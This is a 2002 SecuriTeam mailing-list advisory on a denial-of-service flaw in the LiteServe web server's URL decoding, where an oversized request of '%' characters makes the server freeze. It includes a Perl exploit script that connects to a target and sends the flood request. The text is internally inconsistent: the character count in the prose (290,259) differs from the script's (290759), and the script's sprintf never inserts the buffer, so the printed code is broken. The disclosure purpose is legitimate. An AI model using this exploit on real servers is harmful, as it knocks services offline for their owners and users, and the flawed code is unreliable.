[NT] LiteServe URL Decoding DoS

From: support@securiteam.com
Date: 11/18/02

  • Next message: support@securiteam.com: "[REVS] Security holes... Who cares? (Security patches handling case study)"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Nov 2002 10:20:30 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      LiteServe URL Decoding DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.cmfperception.com/> LiteServe is a powerful, full-featured
    Web, email and FTP server. This server software is perfect for personal
    websites or commercial sites with high traffic demands and multiple
    domains. A vulnerability in the way the program decodes URL allows remote
    attackers to cause it to crash.

    DETAILS

    LiteServe's URL decoder has a problem handling illegal "%xx" sequences,
    such as "%.@", for example, and may produce corrupted output when such a
    sequence is used. The problem appears to be a referencing issue when the
    decode sequence does not specify a legitamite hexadecimal sequence. A
    denial of service may occur if LiteServe is passed an extremely large
    request consisting only of "%" characters. 290,259 such characters will
    cause LiteServe to freeze:

    GET /[buffer] HTTP/1.0

    After this request is processed, attempting to connect to the HTTP service
    reveals that the server is dead.

    Exploit:
    #!/usr/bin/perl
    use IO::Socket;
    $buffer="%"x290759;
    $req=sprintf("GET /%s HTTP/1.0\r\n\r\n");
    $f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp")
    ;
    print $f $req;
    undef $f;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mattmurphy@kc.rr.com>
    Matthew Murphy.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.